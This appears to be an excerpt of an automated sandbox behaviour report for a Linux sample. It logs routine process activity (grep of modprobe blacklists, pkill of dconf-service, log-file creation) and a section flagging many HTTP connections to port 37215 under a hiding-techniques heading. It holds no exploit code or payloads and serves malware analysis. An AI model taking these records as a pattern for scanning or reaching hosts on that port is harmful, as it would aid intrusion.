      Source: /usr/bin/gpu-manager (PID: 6400)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6405)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6407)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/share/language-tools/language-options (PID: 6444)Shell command executed: sh -c "locale -a | grep -F .utf8 "Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6563)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6565)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6567)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6569)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6571)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6573)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6575)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6577)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/share/language-tools/language-options (PID: 6672)Shell command executed: sh -c "locale -a | grep -F .utf8 "Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6762)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6767)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6770)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6780)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6782)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6784)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6786)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6788)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6963)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6968)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6973)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6975)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6977)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6979)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6983)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      Source: /usr/bin/gpu-manager (PID: 6985)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      Source: /usr/share/language-tools/language-options (PID: 7087)Shell command executed: sh -c "locale -a | grep -F .utf8 "
      Source: /bin/sh (PID: 6391)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6393)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6395)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6397)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6399)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6401)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6406)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6408)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6446)Grep executable: /usr/bin/grep -> grep -F .utf8Jump to behavior
      Source: /bin/sh (PID: 6564)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6566)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6568)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6570)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6572)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6574)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6576)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6578)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6674)Grep executable: /usr/bin/grep -> grep -F .utf8Jump to behavior
      Source: /bin/sh (PID: 6763)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6768)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6774)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6781)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6783)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6785)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6787)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
      Source: /bin/sh (PID: 6789)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
      Source: /bin/sh (PID: 6964)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
      Source: /bin/sh (PID: 6969)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
      Source: /bin/sh (PID: 6974)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
      Source: /bin/sh (PID: 6976)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
      Source: /bin/sh (PID: 6978)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
      Source: /bin/sh (PID: 6980)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
      Source: /bin/sh (PID: 6984)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
      Source: /bin/sh (PID: 6986)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
      Source: /bin/sh (PID: 7089)Grep executable: /usr/bin/grep -> grep -F .utf8
      Source: /usr/share/gdm/generate-config (PID: 6411)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-serviceJump to behavior
      Source: /usr/share/gdm/generate-config (PID: 6580)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-serviceJump to behavior
      Source: /usr/share/gdm/generate-config (PID: 6799)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
      Source: /usr/share/gdm/generate-config (PID: 6989)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
      Source: /lib/systemd/systemd-journald (PID: 6240)Reads from proc file: /proc/meminfoJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6481)Reads from proc file: /proc/meminfoJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)Reads from proc file: /proc/meminfoJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6690)Reads from proc file: /proc/meminfoJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6795)Reads from proc file: /proc/meminfo
      Source: /lib/systemd/systemd-journald (PID: 6889)Reads from proc file: /proc/meminfo
      Source: /lib/systemd/systemd-journald (PID: 7000)Reads from proc file: /proc/meminfo
      Source: /sbin/agetty (PID: 6385)Reads version info: /etc/issueJump to behavior
      Source: /sbin/agetty (PID: 6588)Reads version info: /etc/issueJump to behavior
      Source: /sbin/agetty (PID: 6687)Reads version info: /etc/issueJump to behavior
      Source: /sbin/agetty (PID: 6794)Reads version info: /etc/issue
      Source: /sbin/agetty (PID: 6888)Reads version info: /etc/issue
      Source: /sbin/agetty (PID: 6999)Reads version info: /etc/issue
      Source: /usr/sbin/gdm3 (PID: 6423)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
      Source: /usr/sbin/gdm3 (PID: 6423)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
      Source: /usr/lib/accountsservice/accounts-daemon (PID: 6428)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)Jump to behavior
      Source: /usr/lib/accountsservice/accounts-daemon (PID: 6428)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: /usr/sbin/gdm3 (PID: 6662)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
      Source: /usr/sbin/gdm3 (PID: 6662)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
      Source: /usr/lib/accountsservice/accounts-daemon (PID: 6666)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)Jump to behavior
      Source: /usr/lib/accountsservice/accounts-daemon (PID: 6666)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: /usr/sbin/gdm3 (PID: 6891)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
      Source: /usr/sbin/gdm3 (PID: 6891)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
      Source: /usr/sbin/gdm3 (PID: 7072)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
      Source: /usr/sbin/gdm3 (PID: 7072)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
      Source: /usr/lib/accountsservice/accounts-daemon (PID: 7081)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
      Source: /usr/lib/accountsservice/accounts-daemon (PID: 7081)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
      Source: /usr/sbin/rsyslogd (PID: 6312)Log file created: /var/log/kern.log
      Source: /usr/sbin/rsyslogd (PID: 6312)Log file created: /var/log/auth.log
      Source: /usr/bin/gpu-manager (PID: 6389)Log file created: /var/log/gpu-manager.log
      Source: /usr/bin/gpu-manager (PID: 6562)Log file created: /var/log/gpu-manager.log
      Source: /usr/sbin/rsyslogd (PID: 6584)Log file created: /var/log/kern.log
      Source: /usr/sbin/rsyslogd (PID: 6584)Log file created: /var/log/auth.log
      Source: /usr/sbin/rsyslogd (PID: 6681)Log file created: /var/log/kern.log
      Source: /usr/bin/gpu-manager (PID: 6761)Log file created: /var/log/gpu-manager.log
      Source: /usr/sbin/rsyslogd (PID: 6790)Log file created: /var/log/kern.log
      Source: /usr/sbin/rsyslogd (PID: 6790)Log file created: /var/log/auth.log
      Source: /usr/sbin/rsyslogd (PID: 6884)Log file created: /var/log/kern.log
      Source: /usr/sbin/rsyslogd (PID: 6884)Log file created: /var/log/auth.log
      Source: /usr/bin/gpu-manager (PID: 6961)Log file created: /var/log/gpu-manager.logJump to dropped file
      Source: /usr/sbin/rsyslogd (PID: 6995)Log file created: /var/log/kern.logJump to dropped file
      Source: /usr/sbin/rsyslogd (PID: 6995)Log file created: /var/log/auth.logJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 33450 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36036 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52732 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47756 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57172 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43826 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53300 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60906 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58170 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35270 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37746 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51132 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58804 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53850 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42712 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45454 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58028 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36540 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32846 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42800 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40614 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56976 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56384 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54358 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33402 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59702 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 46422 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42562 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35216 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51796 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58198 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38854 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52486 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59726 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49450 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49366 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39972 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40402 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55872 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52068 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34190 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51062 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38040 -> 37215
